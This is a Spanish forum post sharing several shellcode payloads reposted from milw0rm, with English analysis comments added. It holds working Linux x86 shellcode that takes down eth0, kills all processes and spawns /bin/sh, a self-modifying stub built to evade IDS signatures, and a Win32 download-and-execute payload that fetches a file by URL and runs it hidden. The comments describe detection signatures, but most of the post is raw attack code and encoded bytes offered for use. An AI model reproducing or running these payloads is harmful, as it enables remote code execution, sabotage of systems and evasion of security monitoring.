75 Bytes - Desactivar la tarjeta de red:
Código
* 08048060 <_start>:
* 8048060: 6a 0b push $0xb
* 8048062: 58 pop %eax
* 8048063: 99 cltd
* 8048064: 52 push %edx
* 8048065: 68 64 6f 77 6e push $0x6e776f64
* 804806a: 89 e6 mov %esp,%esi
* 804806c: 52 push %edx
* 804806d: 68 65 74 68 30 push $0x30687465 < (eth0) you can change it for other Network card
* 8048072: 89 e1 mov %esp,%ecx
* 8048074: 52 push %edx
* 8048075: 68 6e 66 69 67 push $0x6769666e
* 804807a: 68 69 66 63 6f push $0x6f636669
* 804807f: 68 69 6e 2f 2f push $0x2f2f6e69
* 8048084: 68 2f 2f 73 62 push $0x62732f2f
* 8048089: 89 e3 mov %esp,%ebx
* 804808b: 52 push %edx
* 804808c: 56 push %esi
* 804808d: 51 push %ecx
* 804808e: 53 push %ebx
* 804808f: 89 e1 mov %esp,%ecx
* 8048091: cd 80 int $0x80
*
*/
main()
{
char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x51\x80"
"\x6c\x0e\xff\x01\x80\xe9\x01\x75"
"\xf6\xeb\x05\xe8\xea\xff\xff\xff"
"\x6b\x0c\x59\x9a\x53\x69\x65\x70"
"\x78\x6f\x8a\xe7\x53\x69\x66\x75"
"\x69\x31\x8a\xe2\x53\x69\x6f\x67"
"\x6a\x68\x69\x6a\x67\x64\x70\x69"
"\x6a\x6f\x30\x30\x69\x30\x30\x74"
"\x63\x8a\xe4\x53\x57\x52\x54\x8a"
"\xe2\xce\x81";
61 Bytes - Cerrar todos los procesos del sistema (KillAll):
Código
/* 61-byte Linux x86 payload as posted ("KillAll").
 * The first 24 bytes (\xeb\x11\x5e ... \xe8\xea\xff\xff\xff) are the same
 * self-decoding prefix used by the other two char[] listings on this page;
 * only the count byte after \xb1 differs (\x37 here). The bytes after that
 * prefix are the encoded body, so a signature written against the decoded
 * instructions will not match this string as stored — match on the prefix or
 * on runtime behaviour instead. Treat the literal as sample/IoC material. */
char shellcode[] =
"\xeb\x11\x5e\x31\xc9\xb1\x37\x80"
"\x6c\x0e\xff\x01\x80\xe9\x01\x75"
"\xf6\xeb\x05\xe8\xea\xff\xff\xff"
"\x32\xc1\x51\x67\x69\x6d\x36\x69"
"\x6d\x6d\x62\x6d\x69\x6f\x30\x6c"
"\x6a\x69\x30\x74\x63\x6a\x8a\xe4"
"\x51\x8a\xe3\x54\x8a\xe2\xb1\x0c"
"\xce\x81\x41\xce\x81";
48 Bytes - /bin/sh (Lanzador):
Código
/* 48-byte Linux x86 /bin/sh payload as posted.
 * Same 24-byte self-decoding prefix as the two sibling listings (count byte
 * \x32 here); everything after the prefix is stored in encoded form, so the
 * stored bytes do not contain the plain "\xcd\x80" syscall sequence.
 * Treat the literal as sample/IoC material. */
char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x32\x80"
"\x6c\x0e\xff\x01\x80\xe9\x01\x75"
"\xf6\xeb\x05\xe8\xea\xff\xff\xff"
"\x32\xc1\x51\x69\x30\x30\x74\x69"
"\x69\x30\x63\x6a\x6f\x8a\xe4\x51"
"\x54\x8a\xe2\x9a\xb1\x0c\xce\x81";
64 Bytes - Shellcode self-modifying para evadir IDS:
Código
// Reviewer notes (analysis, GAS/AT&T syntax, Linux x86-32):
// This stub patches itself at run time: the loop at _loopMakeInt80s scans the
// payload one byte at a time and turns every 16-bit value 0x7dca into 0x80cd,
// i.e. the bytes "\xcd\x80" (int $0x80), stopping at the 'AAAA' marker. The
// stored form therefore never contains the syscall bytes, which is the IDS
// evasion the title refers to. Two consequences worth recording:
//  - the code must run from memory that is both writable and executable; an
//    NX / W^X stack or any page-permission enforcement stops the self-patch;
//  - a static signature on "\xcd\x80" will not match it — key detection on
//    the decoder shape instead (the cmpw $0x7dca / addw $0x303 / cmp
//    $0x41414141 loop is fixed, only the payload after _payload varies).
.globl _start
_start:
jmp _findOut
_WhereAmI:
pop %edx // Save our payload's address g20
mov %edx, %esi // and save it 4 later
_loopMakeInt80s:
mov (%edx), %eax // 32-bit load; only the low 16 bits (%ax) are inspected below
cmpw $0x7dca, %ax // Find this guy ( 0x7dca ) and
jne _no
addw $0x303, %ax // 0x7dca + 0x303 == 0x80cd ( int $0x80 )
mov %eax, (%edx) // write the patched dword back in place (requires writable code)
_no:
incb %dl // advance the scan pointer by one byte
cmp $0x41414141, %eax // Use 'AAAA' as end Marker.
jne _loopMakeInt80s
jmp *%esi // Jump to our converted code when done
_findOut:
call _WhereAmI
_payload: // Paste your shell code here and then replace
xor %edx, %edx // "\xcd\x80" (int $0x80) for .ascii "\xca7d"
push $0xb // and end with .ascii "AAAA" as end marker
pop %eax
cltd
push %edx
push $0x68732f2f
push $0x6e69622f
mov %esp, %ebx
push %edx
push %ebx
mov %esp,%ecx
.ascii "\xca\x7d" // + 0x303 = 0xcd80 (int $0x80)
.ascii "AAAA"
=== SOURCE CODE ====
*/
/* 64-byte encoded form of the GAS listing above (same bytes: eb 1c jmp,
 * 5a pop edx, 89 d6, 8b 02, 66 3d ca 7d cmpw, ... , ca 7d 41 41 41 41 marker).
 * NOTE(review): the string literal lost its enclosing double quotes in this
 * paste — as written this is not valid C; the byte values are what matter
 * for analysis. Note that "\xcd\x80" is absent from the stored bytes; the
 * 0xca 0x7d pair is only rewritten at run time. */
char shellcode[] = \xeb\x1c\x5a\x89\xd6\x8b\x02\x66
\x3d\xca\x7d\x75\x06\x66\x05\x03
\x03\x89\x02\xfe\xc2\x3d\x41\x41
\x41\x41\x75\xe9\xff\xe6\xe8\xdf
\xff\xff\xff\x31\xd2\x6a\x0b\x58
\x99\x52\x68\x2f\x2f\x73\x68\x68
\x2f\x62\x69\x6e\x89\xe3
\x52\x53\x89\xe1\xca\x7d\x41\x41\x41\x41";
124 Bytes - Win32 Download and execute Payload:
Código
.386
.model flat,stdcall
; Reviewer notes (MASM, assemble-time helpers):
; ROL_CONSTANT is the rotate count shared by the assemble-time hash below and
; the run-time hash loop (hash_api: add edx,eax / rol edx,ROL_CONSTANT); the two
; must stay in sync or no export name will ever match.
; mrol / mror are expression macros (32-bit rotate left / right). mror is
; defined but not referenced anywhere in this listing.
; hashapi walks the characters of szApi (forc), folds each into dwApi with an
; add-then-rotate step, applies one extra rotate after the loop (this mirrors
; the run-time loop, which performs its add/rol once more on the terminating
; zero byte before dec eax / jns falls through), and emits only the low 16 bits
; as a dw. The run-time comparison is likewise 16-bit (cmp dx,word ptr[esi]).
ROL_CONSTANT equ 5
mrol macro iNum:req,iBits:req
exitm <(iNum shl iBits) or (iNum shr (32-iBits))>
endm
mror macro iNum:req,iBits:req
exitm <(iNum shr iBits) or (iNum shl (32-iBits))>
endm
hashapi macro szApi
local dwApi
dwApi = 0
forc x,szApi
dwApi = dwApi + '&x'
dwApi = mrol(dwApi,ROL_CONSTANT)
endm
dwApi = mrol(dwApi,ROL_CONSTANT)
dw (dwApi and 0ffffh)
endm
.code
assume fs:nothing ; needed so fs:[ecx] below assembles without a segment assumption
; Reviewer notes (analysis, Win32 x86):
; This is the well-known position-independent "download and execute" shape:
;  1. setup_parameters pops the address of the trailing data, builds the
;     argument lists for URLDownloadToFileA / WinExec / ExitProcess on the
;     stack, and NUL-terminates the 0ffh-ended strings in place (stosb).
;  2. load_modules / scan_dll walk fs:[30h] (PEB) -> +0ch (Ldr) -> +1ch
;     (InMemoryOrderModuleList) and, for each module, its export directory
;     (+3ch e_lfanew, +78h export data directory).
;  3. load_api / hash_api recompute the 16-bit ROL-5 hash of every export name
;     and compare it with the next entry of the hashapi table at the end of
;     the file; on a match call_api invokes it and advances to the next hash.
;     Nothing stops the loop except ExitProcess being reached (see comment at
;     jmp load_modules).
; Detection / IoC notes: the fixed offset sequence fs:[30h] / [eax+0ch] /
; [eax+1ch] / [ebx+3ch] / [ebx+eax+78h] together with the lodsb/add/rol hash
; loop is a strong static signature for this resolver; the URL and file name
; are stored in clear text immediately after the code, and the embedded
; hashes below identify the API set (URLDownloadToFileA, WinExec, ExitProcess).
; The stosb writes make the data area self-modifying, so the image must be
; loaded into writable memory.
code_start:
jmp load_data
IFDEF TEST_CODE
extern URLDownloadToFileA :proc
call URLDownloadToFileA ; included when assembled with /DTEST_CODE
ENDIF
setup_parameters:
pop edi ; offset @cmd_start
xor eax,eax ; eax = 0
cdq ; edx = 0
; ********************************************************************
push eax ; exit code = 0
; ********************************************************************
push eax ; SW_HIDE
mov dl,(@cmd_end-@cmd_start)-1 ; this allows command up to 255 bytes
push edi ; file name to execute
; ********************************************************************
push eax ; callback routine URLDownLoadToFileA
push eax ; reserved, must be zero
push edi ; file name to save as
add edi,edx ; get offset of @url_start-1
stosb ; zero tail end
mov dl,(@url_end-@url_start)-1 ; limit of 255 bytes for url
push edi ; url to download file from
push eax ; interface
add edi,edx ; get offset of @urlmon-1
stosb ; zero tail end of url
; *********************************************************************
load_modules:
push edi ; save current offset to hashes
push 30h
pop ecx
mov eax,fs:[ecx] ; PEB base address
mov eax,[eax+0ch] ; PEB_LDR_DATA LoaderData
mov ebp,[eax+1ch] ; LIST_ENTRY InMemoryOrderModuleList
scan_dll:
mov ebx,[ebp+8] ; DllBase
mov ebp,[ebp] ; Flink
push ebp ; save
mov eax,[ebx+3ch]
mov eax,[ebx+eax+78h] ; IMAGE_DIRECTORY_ENTRY_EXPORT
lea esi,[ebx+eax+18h] ; offset IMAGE_EXPORT_DIRECTORY.NumberOfNames
lodsd
xchg eax,ecx ; ecx = NumberOfNames
lodsd
add eax,ebx ; AddressOfFunctions
push eax
lodsd
lea edi,[eax+ebx] ; AddressOfNames
lodsd
lea ebp,[eax+ebx] ; ebp = AddressOfNameOrdinals
load_api:
mov esi,[edi+4*ecx-4]
add esi,ebx
xor eax,eax
cdq
hash_api:
lodsb
add edx,eax
rol edx,ROL_CONSTANT
dec eax
jns hash_api ; exits after the NUL byte (eax = 0 -> dec -> negative)
mov esi,[esp+8] ; get api hashes
cmp dx,word ptr[esi] ; found a match?
je call_api
loop load_api
pop eax ; check
pop ebp ;
jmp scan_dll
call_api:
pop eax
movzx edx,word ptr [ebp+2*ecx-2]
add ebx,[eax+4*edx]
pop ebp ; modules
pop edi ; api hashes
call ebx ; call api
stosw ; advance 2 bytes to next hash
jmp load_modules ; do another, just keep going until ExitProcess is reached.
; *************************
load_data:
call setup_parameters
@cmd_start:
db 'file.exe',0ffh ; WinExec("file.exe",SW_HIDE);
@cmd_end:
@url_start:
db 'http://127.0.0.1/file.exe',0ffh ; url of file to download
@url_end:
hashapi <URLDownloadToFileA>
hashapi <WinExec>
hashapi <ExitProcess>
24 Bytes - Hacer BEEP!:
Código
/* "BEEP" payload as posted. NOTE(review): `char[] shellcode` is not valid C
 * declarator syntax (it reads as Java/C#); and the literal holds 28 bytes, not
 * the 24 the title claims. The bytes call two hard-coded absolute addresses
 * (b8 8f 7a 83 7c / ff d0 and b8 fa ca 81 7c / ff d0, i.e. 0x7c837a8f and
 * 0x7c81cafa), so it is bound to one specific DLL build and load address;
 * ASLR or any other DLL version breaks it. */
char[] shellcode = "\x33\xC0\xB8\x8F\x7A\x83\x7C\x68\x00\x04\x00\x00\x68\x00\x03\x00\x00\xFF\xD0\x33\xC0\xB8\xFA\xCA\x81\x7C\xFF\xD0";
Esos son los más interesantes que he visto en milw0rm, a ver si conocéis alguno más.
Saludos









